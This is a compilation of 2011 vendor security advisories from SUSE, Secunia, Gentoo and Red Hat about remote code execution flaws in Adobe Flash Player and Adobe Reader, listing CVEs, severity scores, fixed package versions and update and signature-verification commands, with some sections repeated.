- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA45583
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45583/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
RELEASE DATE:
2011-08-11
DISCUSS ADVISORY:
http://secunia.com/advisories/45583/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45583/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to disclose sensitive
information and compromise a user's system.
7) An unspecified error can be exploited to disclose certain
information from another domain.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
The vendor credits:
2) Yang Dingning, NCNIPC, Graduate University of Chinese Academy of
Sciences
3) Wushi, Team 509 via iDefense Labs
4, 11) Vitaliy Toropov via iDefense Labs
5) Alexander Zaitsev, Positive Technologies
6, 8) An anonymous person via ZDI
7) Brandon Hardy
9) Bo Qu, Palo Alto Networks
10) Bo Qu, Palo Alto Networks and Honggang Ren, FortiGuard Labs
12) Marc Schoenefeld (Dr. rer. nat.), Red Hat Security Response Team
13) Honggang Ren, FortiGuard Labs
ORIGINAL ADVISORY:
Adobe (APSB11-21):
http://www.adobe.com/support/security/bulletins/apsb11-21.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
VAR-201108-0148 | CVE-2011-2136 | Adobe Flash Player and Adobe AIR Integer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2138 and CVE-2011-2416. Adobe Flash Player and Adobe AIR Contains an integer overflow vulnerability. This vulnerability CVE-2011-2138 ,and CVE-2011-2416 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA45583
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45583/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
RELEASE DATE:
2011-08-11
DISCUSS ADVISORY:
http://secunia.com/advisories/45583/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45583/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
